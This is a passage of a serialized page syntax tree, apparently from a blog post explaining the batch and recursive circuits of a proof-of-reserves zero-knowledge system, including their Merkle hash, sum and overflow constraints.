type":26,"tag":137,"props":96842,"children":96844},{"className":96843},[184],[96845],{"type":32,"value":24273},{"type":26,"tag":137,"props":96847,"children":96849},{"className":96848},[169,170],[96850],{"type":32,"value":41},{"type":26,"tag":137,"props":96852,"children":96854},{"className":96853},[169,170],[96855],{"type":32,"value":96096},{"type":26,"tag":137,"props":96857,"children":96859},{"className":96858},[169,170],[96860],{"type":32,"value":95898},{"type":26,"tag":137,"props":96862,"children":96864},{"className":96863},[169,170],[96865],{"type":32,"value":1549},{"type":26,"tag":137,"props":96867,"children":96869},{"className":96868},[169,170],[96870],{"type":32,"value":24313},{"type":26,"tag":137,"props":96872,"children":96874},{"className":96873,"style":621},[169],[96875],{"type":32,"value":5666},{"type":26,"tag":137,"props":96877,"children":96879},{"className":96878},[169,170],[96880],{"type":32,"value":41},{"type":26,"tag":137,"props":96882,"children":96884},{"className":96883},[169,170],[96885],{"type":32,"value":95638},{"type":26,"tag":137,"props":96887,"children":96889},{"className":96888},[169,170],[96890],{"type":32,"value":24313},{"type":26,"tag":137,"props":96892,"children":96894},{"className":96893,"style":621},[169],[96895],{"type":32,"value":5666},{"type":26,"tag":137,"props":96897,"children":96899},{"className":96898},[169,170],[96900],{"type":32,"value":95654},{"type":26,"tag":137,"props":96902,"children":96904},{"className":96903,"style":537},[169,170],[96905],{"type":32,"value":540},{"type":26,"tag":137,"props":96907,"children":96909},{"className":96908},[169,170],[96910],{"type":32,"value":95665},{"type":26,"tag":137,"props":96912,"children":96914},{"className":96913},[169,170],[96915],{"type":32,"value":95671},{"type":26,"tag":137,"props":96917,"children":96919},{"className":96918},[169],[96920,96925],{"type":26,"tag":137,"props":96921,"children":96923},{"className":96922},[169,170],[96924],{"type":32,"value":13242},{"type":26,"tag":137,"props":96926,"children":96928},{"className":96927},[236],[96929],{"type":26,"tag":137,"props":96930,"children":96932},{"className":96931},[241,417],[96933,96962],{"type":26,"tag":137,"props":96934,"children":96936},{"className":96935},[246],[96937,96957],{"type":26,"tag":137,"props":96938,"children":96940},{"className":96939,"style":556},[251],[96941],{"type":26,"tag":137,"props":96942,"children":96943},{"style":430},[96944,96948],{"type":26,"tag":137,"props":96945,"children":96947},{"className":96946,"style":262},[261],[],{"type":26,"tag":137,"props":96949,"children":96951},{"className":96950},[267,268,269,270],[96952],{"type":26,"tag":137,"props":96953,"children":96955},{"className":96954},[169,170,270],[96956],{"type":32,"value":506},{"type":26,"tag":137,"props":96958,"children":96960},{"className":96959},[453],[96961],{"type":32,"value":456},{"type":26,"tag":137,"props":96963,"children":96965},{"className":96964},[246],[96966],{"type":26,"tag":137,"props":96967,"children":96969},{"className":96968,"style":464},[251],[96970],{"type":26,"tag":137,"props":96971,"children":96972},{},[],{"type":26,"tag":137,"props":96974,"children":96976},{"className":96975},[162],[96977],{"type":32,"value":3016},{"type":26,"tag":137,"props":96979,"children":96981},{"className":96980},[169,170],[96982],{"type":32,"value":41},{"type":26,"tag":137,"props":96984,"children":96986},{"className":96985},[169,170],[96987],{"type":32,"value":95638},{"type":26,"tag":137,"props":96989,"children":96991},{"className":96990},[169,170],[96992],{"type":32,"value":24313},{"type":26,"tag":137,"props":96994,"children":96996},{"className":96995,"style":621},[169],[96997],{"type":32,"value":5666},{"type":26,"tag":137,"props":96999,"children":97001},{"className":97000},[169,170],[97002],{"type":32,"value":1549},{"type":26,"tag":137,"props":97004,"children":97006},{"className":97005},[169,170],[97007],{"type":32,"value":95898},{"type":26,"tag":137,"props":97009,"children":97011},{"className":97010},[169,170],[97012],{"type":32,"value":53736},{"type":26,"tag":137,"props":97014,"children":97016},{"className":97015},[197],[97017],{"type":32,"value":3079},{"type":32,"value":1011},{"type":26,"tag":84,"props":97020,"children":97021},{},[97022],{"type":32,"value":97023},"(sum proof)",{"type":26,"tag":3430,"props":97025,"children":97026},{},[97027,97416,97417],{"type":26,"tag":130,"props":97028,"children":97030},{"className":97029},[133,134],[97031],{"type":26,"tag":137,"props":97032,"children":97034},{"className":97033},[140],[97035],{"type":26,"tag":137,"props":97036,"children":97038},{"className":97037,"ariaHidden":146},[145],[97039,97125],{"type":26,"tag":137,"props":97040,"children":97042},{"className":97041},[151],[97043,97048,97053,97059,97065,97070,97075,97080,97085,97091,97096,97102,97107,97112,97116,97121],{"type":26,"tag":137,"props":97044,"children":97047},{"className":97045,"style":97046},[156],"height:1.0044em;vertical-align:-0.31em;",[],{"type":26,"tag":137,"props":97049,"children":97051},{"className":97050},[169,170],[97052],{"type":32,"value":53736},{"type":26,"tag":137,"props":97054,"children":97056},{"className":97055,"style":621},[169,170],[97057],{"type":32,"value":97058},"er",{"type":26,"tag":137,"props":97060,"children":97063},{"className":97061,"style":97062},[169,170],"margin-right:0.03148em;",[97064],{"type":32,"value":91286},{"type":26,"tag":137,"props":97066,"children":97068},{"className":97067,"style":537},[169,170],[97069],{"type":32,"value":540},{"type":26,"tag":137,"props":97071,"children":97073},{"className":97072},[169,170],[97074],{"type":32,"value":54057},{"type":26,"tag":137,"props":97076,"children":97078},{"className":97077,"style":621},[169],[97079],{"type":32,"value":5666},{"type":26,"tag":137,"props":97081,"children":97083},{"className":97082},[169,170],[97084],{"type":32,"value":24313},{"type":26,"tag":137,"props":97086,"children":97088},{"className":97087},[169,170],[97089],{"type":32,"value":97090},"ree",{"type":26,"tag":137,"props":97092,"children":97094},{"className":97093,"style":621},[169],[97095],{"type":32,"value":5666},{"type":26,"tag":137,"props":97097,"children":97099},{"className":97098},[169,170],[97100],{"type":32,"value":97101},"ha",{"type":26,"tag":137,"props":97103,"children":97105},{"className":97104},[169,170],[97106],{"type":32,"value":13242},{"type":26,"tag":137,"props":97108,"children":97110},{"className":97109},[169,170],[97111],{"type":32,"value":86947},{"type":26,"tag":137,"props":97113,"children":97115},{"className":97114,"style":281},[184],[],{"type":26,"tag":137,"props":97117,"children":97119},{"className":97118},[286],[97120],{"type":32,"value":11161},{"type":26,"tag":137,"props":97122,"children":97124},{"className":97123,"style":281},[184],[],{"type":26,"tag":137,"props":97126,"children":97128},{"className":97127},[151],[97129,97133,97138,97143,97148,97153,97158,97163,97168,97173,97178,97235,97240,97244,97249,97254,97311,97316,97321,97325,97330,97335,97339,97344,97349,97411],{"type":26,"tag":137,"props":97130,"children":97132},{"className":97131,"style":157},[156],[],{"type":26,"tag":137,"props":97134,"children":97136},{"className":97135,"style":1731},[169,170],[97137],{"type":32,"value":24181},{"type":26,"tag":137,"props":97139,"children":97141},{"className":97140},[169,170],[97142],{"type":32,"value":95602},{"type":26,"tag":137,"props":97144,"children":97146},{"className":97145},[169,170],[97147],{"type":32,"value":506},{"type":26,"tag":137,"props":97149,"children":97151},{"className":97150},[169,170],[97152],{"type":32,"value":3293},{"type":26,"tag":137,"props":97154,"children":97156},{"className":97155},[169,170],[97157],{"type":32,"value":705},{"type":26,"tag":137,"props":97159,"children":97161},{"className":97160},[169,170],[97162],{"type":32,"value":1549},{"type":26,"tag":137,"props":97164,"children":97166},{"className":97165},[162],[97167],{"type":32,"value":165},{"type":26,"tag":137,"props":97169,"children":97171},{"className":97170},[169,170],[97172],{"type":32,"value":97101},{"type":26,"tag":137,"props":97174,"children":97176},{"className":97175},[169,170],[97177],{"type":32,"value":13242},{"type":26,"tag":137,"props":97179,"children":97181},{"className":97180},[169],[97182,97187],{"type":26,"tag":137,"props":97183,"children":97185},{"className":97184},[169,170],[97186],{"type":32,"value":86947},{"type":26,"tag":137,"props":97188,"children":97190},{"className":97189},[236],[97191],{"type":26,"tag":137,"props":97192,"children":97194},{"className":97193},[241,417],[97195,97224],{"type":26,"tag":137,"props":97196,"children":97198},{"className":97197},[246],[97199,97219],{"type":26,"tag":137,"props":97200,"children":97202},{"className":97201,"style":426},[251],[97203],{"type":26,"tag":137,"props":97204,"children":97205},{"style":430},[97206,97210],{"type":26,"tag":137,"props":97207,"children":97209},{"className":97208,"style":262},[261],[],{"type":26,"tag":137,"props":97211,"children":97213},{"className":97212},[267,268,269,270],[97214],{"type":26,"tag":137,"props":97215,"children":97217},{"className":97216},[169,270],[97218],{"type":32,"value":1817},{"type":26,"tag":137,"props":97220,"children":97222},{"className":97221},[453],[97223],{"type":32,"value":456},{"type":26,"tag":137,"props":97225,"children":97227},{"className":97226},[246],[97228],{"type":26,"tag":137,"props":97229,"children":97231},{"className":97230,"style":464},[251],[97232],{"type":26,"tag":137,"props":97233,"children":97234},{},[],{"type":26,"tag":137,"props":97236,"children":97238},{"className":97237},[177],[97239],{"type":32,"value":180},{"type":26,"tag":137,"props":97241,"children":97243},{"className":97242,"style":185},[184],[],{"type":26,"tag":137,"props":97245,"children":97247},{"className":97246},[169,170],[97248],{"type":32,"value":97101},{"type":26,"tag":137,"props":97250,"children":97252},{"className":97251},[169,170],[97253],{"type":32,"value":13242},{"type":26,"tag":137,"props":97255,"children":97257},{"className":97256},[169],[97258,97263],{"type":26,"tag":137,"props":97259,"children":97261},{"className":97260},[169,170],[97262],{"type":32,"value":86947},{"type":26,"tag":137,"props":97264,"children":97266},{"className":97265},[236],[97267],{"type":26,"tag":137,"props":97268,"children":97270},{"className":97269},[241,417],[97271,97300],{"type":26,"tag":137,"props":97272,"children":97274},{"className":97273},[246],[97275,97295],{"type":26,"tag":137,"props":97276,"children":97278},{"className":97277,"style":426},[251],[97279],{"type":26,"tag":137,"props":97280,"children":97281},{"style":430},[97282,97286],{"type":26,"tag":137,"props":97283,"children":97285},{"className":97284,"style":262},[261],[],{"type":26,"tag":137,"props":97287,"children":97289},{"className":97288},[267,268,269,270],[97290],{"type":26,"tag":137,"props":97291,"children":97293},{"className":97292},[169,270],[97294],{"type":32,"value":878},{"type":26,"tag":137,"props":97296,"children":97298},{"className":97297},[453],[97299],{"type":32,"value":456},{"type":26,"tag":137,"props":97301,"children":97303},{"className":97302},[246],[97304],{"type":26,"tag":137,"props":97305,"children":97307},{"className":97306,"style":464},[251],[97308],{"type":26,"tag":137,"props":97309,"children":97310},{},[],{"type":26,"tag":137,"props":97312,"children":97314},{"className":97313},[177],[97315],{"type":32,"value":180},{"type":26,"tag":137,"props":97317,"children":97319},{"className":97318},[184],[97320],{"type":32,"value":24273},{"type":26,"tag":137,"props":97322,"children":97324},{"className":97323,"style":185},[184],[],{"type":26,"tag":137,"props":97326,"children":97328},{"className":97327},[169],[97329],{"type":32,"value":12180},{"type":26,"tag":137,"props":97331,"children":97333},{"className":97332},[177],[97334],{"type":32,"value":180},{"type":26,"tag":137,"props":97336,"children":97338},{"className":97337,"style":185},[184],[],{"type":26,"tag":137,"props":97340,"children":97342},{"className":97341},[169,170],[97343],{"type":32,"value":97101},{"type":26,"tag":137,"props":97345,"children":97347},{"className":97346},[169,170],[97348],{"type":32,"value":13242},{"type":26,"tag":137,"props":97350,"children":97352},{"className":97351},[169],[97353,97358],{"type":26,"tag":137,"props":97354,"children":97356},{"className":97355},[169,170],[97357],{"type":32,"value":86947},{"type":26,"tag":137,"props":97359,"children":97361},{"className":97360},[236],[97362],{"type":26,"tag":137,"props":97363,"children":97365},{"className":97364},[241,417],[97366,97400],{"type":26,"tag":137,"props":97367,"children":97369},{"className":97368},[246],[97370,97395],{"type":26,"tag":137,"props":97371,"children":97373},{"className":97372,"style":426},[251],[97374],{"type":26,"tag":137,"props":97375,"children":97376},{"style":430},[97377,97381],{"type":26,"tag":137,"props":97378,"children":97380},{"className":97379,"style":262},[261],[],{"type":26,"tag":137,"props":97382,"children":97384},{"className":97383},[267,268,269,270],[97385],{"type":26,"tag":137,"props":97386,"children":97388},{"className":97387},[169,270],[97389],{"type":26,"tag":137,"props":97390,"children":97392},{"className":97391},[169,270],[97393],{"type":32,"value":97394},"511",{"type":26,"tag":137,"props":97396,"children":97398},{"className":97397},[453],[97399],{"type":32,"value":456},{"type":26,"tag":137,"props":97401,"children":97403},{"className":97402},[246],[97404],{"type":26,"tag":137,"props":97405,"children":97407},{"className":97406,"style":464},[251],[97408],{"type":26,"tag":137,"props":97409,"children":97410},{},[],{"type":26,"tag":137,"props":97412,"children":97414},{"className":97413},[197],[97415],{"type":32,"value":200},{"type":32,"value":1011},{"type":26,"tag":84,"props":97418,"children":97419},{},[97420],{"type":32,"value":97421},"(merkle tree hash)",{"type":26,"tag":3430,"props":97423,"children":97424},{},[97425,97698,97699,97704,97706,97711],{"type":26,"tag":130,"props":97426,"children":97428},{"className":97427},[133,134],[97429],{"type":26,"tag":137,"props":97430,"children":97432},{"className":97431},[140],[97433],{"type":26,"tag":137,"props":97434,"children":97436},{"className":97435,"ariaHidden":146},[145],[97437,97630],{"type":26,"tag":137,"props":97438,"children":97440},{"className":97439},[151],[97441,97445,97450,97455,97460,97465,97470,97475,97480,97485,97490,97495,97500,97505,97510,97515,97572,97577,97582,97587,97592,97597,97602,97607,97612,97617,97621,97626],{"type":26,"tag":137,"props":97442,"children":97444},{"className":97443,"style":95590},[156],[],{"type":26,"tag":137,"props":97446,"children":97448},{"className":97447},[169,170],[97449],{"type":32,"value":41},{"type":26,"tag":137,"props":97451,"children":97453},{"className":97452},[169,170],[97454],{"type":32,"value":96096},{"type":26,"tag":137,"props":97456,"children":97458},{"className":97457},[169,170],[97459],{"type":32,"value":95898},{"type":26,"tag":137,"props":97461,"children":97463},{"className":97462},[169,170],[97464],{"type":32,"value":1549},{"type":26,"tag":137,"props":97466,"children":97468},{"className":97467},[169,170],[97469],{"type":32,"value":24313},{"type":26,"tag":137,"props":97471,"children":97473},{"className":97472,"style":621},[169],[97474],{"type":32,"value":5666},{"type":26,"tag":137,"props":97476,"children":97478},{"className":97477},[169,170],[97479],{"type":32,"value":41},{"type":26,"tag":137,"props":97481,"children":97483},{"className":97482},[169,170],[97484],{"type":32,"value":95638},{"type":26,"tag":137,"props":97486,"children":97488},{"className":97487},[169,170],[97489],{"type":32,"value":24313},{"type":26,"tag":137,"props":97491,"children":97493},{"className":97492,"style":621},[169],[97494],{"type":32,"value":5666},{"type":26,"tag":137,"props":97496,"children":97498},{"className":97497},[169,170],[97499],{"type":32,"value":95654},{"type":26,"tag":137,"props":97501,"children":97503},{"className":97502,"style":537},[169,170],[97504],{"type":32,"value":540},{"type":26,"tag":137,"props":97506,"children":97508},{"className":97507},[169,170],[97509],{"type":32,"value":95665},{"type":26,"tag":137,"props":97511,"children":97513},{"className":97512},[169,170],[97514],{"type":32,"value":95671},{"type":26,"tag":137,"props":97516,"children":97518},{"className":97517},[169],[97519,97524],{"type":26,"tag":137,"props":97520,"children":97522},{"className":97521},[169,170],[97523],{"type":32,"value":13242},{"type":26,"tag":137,"props":97525,"children":97527},{"className":97526},[236],[97528],{"type":26,"tag":137,"props":97529,"children":97531},{"className":97530},[241,417],[97532,97561],{"type":26,"tag":137,"props":97533,"children":97535},{"className":97534},[246],[97536,97556],{"type":26,"tag":137,"props":97537,"children":97539},{"className":97538,"style":556},[251],[97540],{"type":26,"tag":137,"props":97541,"children":97542},{"style":430},[97543,97547],{"type":26,"tag":137,"props":97544,"children":97546},{"className":97545,"style":262},[261],[],{"type":26,"tag":137,"props":97548,"children":97550},{"className":97549},[267,268,269,270],[97551],{"type":26,"tag":137,"props":97552,"children":97554},{"className":97553},[169,170,270],[97555],{"type":32,"value":506},{"type":26,"tag":137,"props":97557,"children":97559},{"className":97558},[453],[97560],{"type":32,"value":456},{"type":26,"tag":137,"props":97562,"children":97564},{"className":97563},[246],[97565],{"type":26,"tag":137,"props":97566,"children":97568},{"className":97567,"style":464},[251],[97569],{"type":26,"tag":137,"props":97570,"children":97571},{},[],{"type":26,"tag":137,"props":97573,"children":97575},{"className":97574},[162],[97576],{"type":32,"value":3016},{"type":26,"tag":137,"props":97578,"children":97580},{"className":97579},[169,170],[97581],{"type":32,"value":41},{"type":26,"tag":137,"props":97583,"children":97585},{"className":97584},[169,170],[97586],{"type":32,"value":95638},{"type":26,"tag":137,"props":97588,"children":97590},{"className":97589},[169,170],[97591],{"type":32,"value":24313},{"type":26,"tag":137,"props":97593,"children":97595},{"className":97594,"style":621},[169],[97596],{"type":32,"value":5666},{"type":26,"tag":137,"props":97598,"children":97600},{"className":97599},[169,170],[97601],{"type":32,"value":1549},{"type":26,"tag":137,"props":97603,"children":97605},{"className":97604},[169,170],[97606],{"type":32,"value":95898},{"type":26,"tag":137,"props":97608,"children":97610},{"className":97609},[169,170],[97611],{"type":32,"value":53736},{"type":26,"tag":137,"props":97613,"children":97615},{"className":97614},[197],[97616],{"type":32,"value":3079},{"type":26,"tag":137,"props":97618,"children":97620},{"className":97619,"style":281},[184],[],{"type":26,"tag":137,"props":97622,"children":97624},{"className":97623},[286],[97625],{"type":32,"value":8391},{"type":26,"tag":137,"props":97627,"children":97629},{"className":97628,"style":281},[184],[],{"type":26,"tag":137,"props":97631,"children":97633},{"className":97632},[151],[97634,97638,97643,97648,97654,97659,97664,97669,97675,97680,97686,97692],{"type":26,"tag":137,"props":97635,"children":97637},{"className":97636,"style":95590},[156],[],{"type":26,"tag":137,"props":97639,"children":97641},{"className":97640,"style":832},[169,170],[97642],{"type":32,"value":835},{"type":26,"tag":137,"props":97644,"children":97646},{"className":97645},[169,170],[97647],{"type":32,"value":79370},{"type":26,"tag":137,"props":97649,"children":97652},{"className":97650,"style":97651},[169,170],"margin-right:0.07847em;",[97653],{"type":32,"value":8718},{"type":26,"tag":137,"props":97655,"children":97657},{"className":97656,"style":621},[169],[97658],{"type":32,"value":5666},{"type":26,"tag":137,"props":97660,"children":97662},{"className":97661,"style":24627},[169,170],[97663],{"type":32,"value":24630},{"type":26,"tag":137,"props":97665,"children":97667},{"className":97666},[169,170],[97668],{"type":32,"value":79370},{"type":26,"tag":137,"props":97670,"children":97672},{"className":97671,"style":24627},[169,170],[97673],{"type":32,"value":97674},"FE",{"type":26,"tag":137,"props":97676,"children":97678},{"className":97677,"style":621},[169],[97679],{"type":32,"value":5666},{"type":26,"tag":137,"props":97681,"children":97683},{"className":97682,"style":97651},[169,170],[97684],{"type":32,"value":97685},"I",{"type":26,"tag":137,"props":97687,"children":97689},{"className":97688,"style":1731},[169,170],[97690],{"type":32,"value":97691},"NT",{"type":26,"tag":137,"props":97693,"children":97695},{"className":97694},[169],[97696],{"type":32,"value":97697},"/512",{"type":32,"value":1011},{"type":26,"tag":84,"props":97700,"children":97701},{},[97702],{"type":32,"value":97703},"(overflow check)",{"type":32,"value":97705}," --> overflow check is made this way for performance (note that 512 is actually the ",{"type":26,"tag":130,"props":97707,"children":97709},{"className":97708},[],[97710],{"type":32,"value":95506},{"type":32,"value":200},{"type":26,"tag":35,"props":97713,"children":97714},{},[97715],{"type":32,"value":97716},"Here is a visual scheme of the inputs of the batch circuit + how user hashes are generated:",{"type":26,"tag":35,"props":97718,"children":97719},{},[97720],{"type":26,"tag":2210,"props":97721,"children":97723},{"alt":53181,"src":97722},"/posts/por/batch-circuit-inputs.png",[],{"type":26,"tag":118,"props":97725,"children":97727},{"id":97726},"recursive-circuit",[97728],{"type":32,"value":97729},"Recursive Circuit",{"type":26,"tag":35,"props":97731,"children":97732},{},[97733],{"type":32,"value":97734},"Recursive circuits get eight subproofs as input, verify if all the asset prices are the same, and calculate the summed balances and Merkle hash. Here are the constraints.",{"type":26,"tag":35,"props":97736,"children":97737},{},[97738],{"type":26,"tag":84,"props":97739,"children":97740},{},[97741],{"type":32,"value":96011},{"type":26,"tag":3426,"props":97743,"children":97744},{},[97745,97749,97754],{"type":26,"tag":3430,"props":97746,"children":97747},{},[97748],{"type":32,"value":96029},{"type":26,"tag":3430,"props":97750,"children":97751},{},[97752],{"type":32,"value":97753},"Asset prices",{"type":26,"tag":3430,"props":97755,"children":97756},{},[97757],{"type":32,"value":96024},{"type":26,"tag":35,"props":97759,"children":97760},{},[97761],{"type":26,"tag":84,"props":97762,"children":97763},{},[97764],{"type":32,"value":96037},{"type":26,"tag":3426,"props":97766,"children":97767},{},[97768],{"type":26,"tag":3430,"props":97769,"children":97770},{},[97771],{"type":32,"value":97772},"8 subproofs",{"type":26,"tag":35,"props":97774,"children":97775},{},[97776],{"type":26,"tag":84,"props":97777,"children":97778},{},[97779],{"type":32,"value":96058},{"type":26,"tag":3426,"props":97781,"children":97782},{},[97783,98191,98522,98889,99276],{"type":26,"tag":3430,"props":97784,"children":97785},{},[97786,98186,98187],{"type":26,"tag":130,"props":97787,"children":97789},{"className":97788},[133,134],[97790],{"type":26,"tag":137,"props":97791,"children":97793},{"className":97792},[140],[97794],{"type":26,"tag":137,"props":97795,"children":97797},{"className":97796,"ariaHidden":146},[145],[97798,97934],{"type":26,"tag":137,"props":97799,"children":97801},{"className":97800},[151],[97802,97806,97811,97816,97821,97826,97831,97836,97841,97846,97851,97856,97861,97866,97871,97876,97881,97886,97891,97896,97901,97906,97911,97916,97921,97925,97930],{"type":26,"tag":137,"props":97803,"children":97805},{"className":97804,"style":95590},[156],[],{"type":26,"tag":137,"props":97807,"children":97809},{"className":97808},[169,170],[97810],{"type":32,"value":24313},{"type":26,"tag":137,"props":97812,"children":97814},{"className":97813},[169,170],[97815],{"type":32,"value":705},{"type":26,"tag":137,"props":97817,"children":97819},{"className":97818},[169,170],[97820],{"type":32,"value":24313},{"type":26,"tag":137,"props":97822,"children":97824},{"className":97823},[169,170],[97825],{"type":32,"value":41},{"type":26,"tag":137,"props":97827,"children":97829},{"className":97828,"style":537},[169,170],[97830],{"type":32,"value":540},{"type":26,"tag":137,"props":97832,"children":97834},{"className":97833,"style":621},[169],[97835],{"type":32,"value":5666},{"type":26,"tag":137,"props":97837,"children":97839},{"className":97838},[169,170],[97840],{"type":32,"value":41},{"type":26,"tag":137,"props":97842,"children":97844},{"className":97843},[169,170],[97845],{"type":32,"value":95638},{"type":26,"tag":137,"props":97847,"children":97849},{"className":97848},[169,170],[97850],{"type":32,"value":24313},{"type":26,"tag":137,"props":97852,"children":97854},{"className":97853,"style":621},[169],[97855],{"type":32,"value":5666},{"type":26,"tag":137,"props":97857,"children":97859},{"className":97858},[169,170],[97860],{"type":32,"value":95654},{"type":26,"tag":137,"props":97862,"children":97864},{"className":97863,"style":537},[169,170],[97865],{"type":32,"value":540},{"type":26,"tag":137,"props":97867,"children":97869},{"className":97868},[169,170],[97870],{"type":32,"value":95665},{"type":26,"tag":137,"props":97872,"children":97874},{"className":97873},[169,170],[97875],{"type":32,"value":95671},{"type":26,"tag":137,"props":97877,"children":97879},{"className":97878},[162],[97880],{"type":32,"value":3016},{"type":26,"tag":137,"props":97882,"children":97884},{"className":97883},[169,170],[97885],{"type":32,"value":41},{"type":26,"tag":137,"props":97887,"children":97889},{"className":97888},[169,170],[97890],{"type":32,"value":95638},{"type":26,"tag":137,"props":97892,"children":97894},{"className":97893},[169,170],[97895],{"type":32,"value":24313},{"type":26,"tag":137,"props":97897,"children":97899},{"className":97898,"style":621},[169],[97900],{"type":32,"value":5666},{"type":26,"tag":137,"props":97902,"children":97904},{"className":97903},[169,170],[97905],{"type":32,"value":1549},{"type":26,"tag":137,"props":97907,"children":97909},{"className":97908},[169,170],[97910],{"type":32,"value":95898},{"type":26,"tag":137,"props":97912,"children":97914},{"className":97913},[169,170],[97915],{"type":32,"value":53736},{"type":26,"tag":137,"props":97917,"children":97919},{"className":97918},[197],[97920],{"type":32,"value":3079},{"type":26,"tag":137,"props":97922,"children":97924},{"className":97923,"style":281},[184],[],{"type":26,"tag":137,"props":97926,"children":97928},{"className":97927},[286],[97929],{"type":32,"value":11161},{"type":26,"tag":137,"props":97931,"children":97933},{"className":97932,"style":281},[184],[],{"type":26,"tag":137,"props":97935,"children":97937},{"className":97936},[151],[97938,97942,97947,97952,97957,97962,97967,97972,97978,98035,98040,98045,98050,98055,98060,98065,98070,98075,98081,98086,98091,98096,98101,98106,98111,98116,98121,98126,98131,98136,98141,98146,98151,98156,98161,98166,98171,98176,98181],{"type":26,"tag":137,"props":97939,"children":97941},{"className":97940,"style":95590},[156],[],{"type":26,"tag":137,"props":97943,"children":97945},{"className":97944},[169],[97946],{"type":32,"value":96225},{"type":26,"tag":137,"props":97948,"children":97950},{"className":97949},[184],[97951],{"type":32,"value":24273},{"type":26,"tag":137,"props":97953,"children":97955},{"className":97954},[169,170],[97956],{"type":32,"value":13242},{"type":26,"tag":137,"props":97958,"children":97960},{"className":97959},[169,170],[97961],{"type":32,"value":95898},{"type":26,"tag":137,"props":97963,"children":97965},{"className":97964},[169,170],[97966],{"type":32,"value":2832},{"type":26,"tag":137,"props":97968,"children":97970},{"className":97969},[169,170],[97971],{"type":32,"value":35},{"type":26,"tag":137,"props":97973,"children":97975},{"className":97974},[169,170],[97976],{"type":32,"value":97977},"roo",{"type":26,"tag":137,"props":97979,"children":97981},{"className":97980},[169],[97982,97987],{"type":26,"tag":137,"props":97983,"children":97985},{"className":97984,"style":1039},[169,170],[97986],{"type":32,"value":1042},{"type":26,"tag":137,"props":97988,"children":97990},{"className":97989},[236],[97991],{"type":26,"tag":137,"props":97992,"children":97994},{"className":97993},[241,417],[97995,98024],{"type":26,"tag":137,"props":97996,"children":97998},{"className":97997},[246],[97999,98019],{"type":26,"tag":137,"props":98000,"children":98002},{"className":98001,"style":556},[251],[98003],{"type":26,"tag":137,"props":98004,"children":98005},{"style":1061},[98006,98010],{"type":26,"tag":137,"props":98007,"children":98009},{"className":98008,"style":262},[261],[],{"type":26,"tag":137,"props":98011,"children":98013},{"className":98012},[267,268,269,270],[98014],{"type":26,"tag":137,"props":98015,"children":98017},{"className":98016},[169,170,270],[98018],{"type":32,"value":506},{"type":26,"tag":137,"props":98020,"children":98022},{"className":98021},[453],[98023],{"type":32,"value":456},{"type":26,"tag":137,"props":98025,"children":98027},{"className":98026},[246],[98028],{"type":26,"tag":137,"props":98029,"children":98031},{"className":98030,"style":464},[251],[98032],{"type":26,"tag":137,"props":98033,"children":98034},{},[],{"type":26,"tag":137,"props":98036,"children":98038},{"className":98037},[169],[98039],{"type":32,"value":470},{"type":26,"tag":137,"props":98041,"children":98043},{"className":98042},[169,170],[98044],{"type":32,"value":35},{"type":26,"tag":137,"props":98046,"children":98048},{"className":98047},[169,170],[98049],{"type":32,"value":95898},{"type":26,"tag":137,"props":98051,"children":98053},{"className":98052},[169,170],[98054],{"type":32,"value":2832},{"type":26,"tag":137,"props":98056,"children":98058},{"className":98057,"style":537},[169,170],[98059],{"type":32,"value":540},{"type":26,"tag":137,"props":98061,"children":98063},{"className":98062},[169,170],[98064],{"type":32,"value":506},{"type":26,"tag":137,"props":98066,"children":98068},{"className":98067},[169,170],[98069],{"type":32,"value":4326},{"type":26,"tag":137,"props":98071,"children":98073},{"className":98072,"style":621},[169],[98074],{"type":32,"value":5666},{"type":26,"tag":137,"props":98076,"children":98078},{"className":98077},[169,170],[98079],{"type":32,"value":98080},"in",{"type":26,"tag":137,"props":98082,"children":98084},{"className":98083},[169,170],[98085],{"type":32,"value":35},{"type":26,"tag":137,"props":98087,"children":98089},{"className":98088},[169,170],[98090],{"type":32,"value":95898},{"type":26,"tag":137,"props":98092,"children":98094},{"className":98093},[169,170],[98095],{"type":32,"value":24313},{"type":26,"tag":137,"props":98097,"children":98099},{"className":98098},[169],[98100],{"type":32,"value":470},{"type":26,"tag":137,"props":98102,"children":98104},{"className":98103},[169,170],[98105],{"type":32,"value":41},{"type":26,"tag":137,"props":98107,"children":98109},{"className":98108},[169,170],[98110],{"type":32,"value":95638},{"type":26,"tag":137,"props":98112,"children":98114},{"className":98113},[169,170],[98115],{"type":32,"value":24313},{"type":26,"tag":137,"props":98117,"children":98119},{"className":98118,"style":621},[169],[98120],{"type":32,"value":5666},{"type":26,"tag":137,"props":98122,"children":98124},{"className":98123},[169,170],[98125],{"type":32,"value":95654},{"type":26,"tag":137,"props":98127,"children":98129},{"className":98128,"style":537},[169,170],[98130],{"type":32,"value":540},{"type":26,"tag":137,"props":98132,"children":98134},{"className":98133},[169,170],[98135],{"type":32,"value":95665},{"type":26,"tag":137,"props":98137,"children":98139},{"className":98138},[169,170],[98140],{"type":32,"value":96464},{"type":26,"tag":137,"props":98142,"children":98144},{"className":98143},[162],[98145],{"type":32,"value":3016},{"type":26,"tag":137,"props":98147,"children":98149},{"className":98148},[169,170],[98150],{"type":32,"value":41},{"type":26,"tag":137,"props":98152,"children":98154},{"className":98153},[169,170],[98155],{"type":32,"value":95638},{"type":26,"tag":137,"props":98157,"children":98159},{"className":98158},[169,170],[98160],{"type":32,"value":24313},{"type":26,"tag":137,"props":98162,"children":98164},{"className":98163,"style":621},[169],[98165],{"type":32,"value":5666},{"type":26,"tag":137,"props":98167,"children":98169},{"className":98168},[169,170],[98170],{"type":32,"value":1549},{"type":26,"tag":137,"props":98172,"children":98174},{"className":98173},[169,170],[98175],{"type":32,"value":95898},{"type":26,"tag":137,"props":98177,"children":98179},{"className":98178},[169,170],[98180],{"type":32,"value":53736},{"type":26,"tag":137,"props":98182,"children":98184},{"className":98183},[197],[98185],{"type":32,"value":3079},{"type":32,"value":1011},{"type":26,"tag":84,"props":98188,"children":98189},{},[98190],{"type":32,"value":97023},{"type":26,"tag":3430,"props":98192,"children":98193},{},[98194],{"type":26,"tag":130,"props":98195,"children":98197},{"className":98196},[133,134],[98198],{"type":26,"tag":137,"props":98199,"children":98201},{"className":98200},[140],[98202],{"type":26,"tag":137,"props":98203,"children":98205},{"className":98204,"ariaHidden":146},[145],[98206,98312],{"type":26,"tag":137,"props":98207,"children":98209},{"className":98208},[151],[98210,98214,98219,98224,98229,98234,98239,98244,98249,98254,98259,98264,98269,98274,98279,98284,98289,98294,98299,98303,98308],{"type":26,"tag":137,"props":98211,"children":98213},{"className":98212,"style":95590},[156],[],{"type":26,"tag":137,"props":98215,"children":98217},{"className":98216},[169,170],[98218],{"type":32,"value":41},{"type":26,"tag":137,"props":98220,"children":98222},{"className":98221},[169,170],[98223],{"type":32,"value":95638},{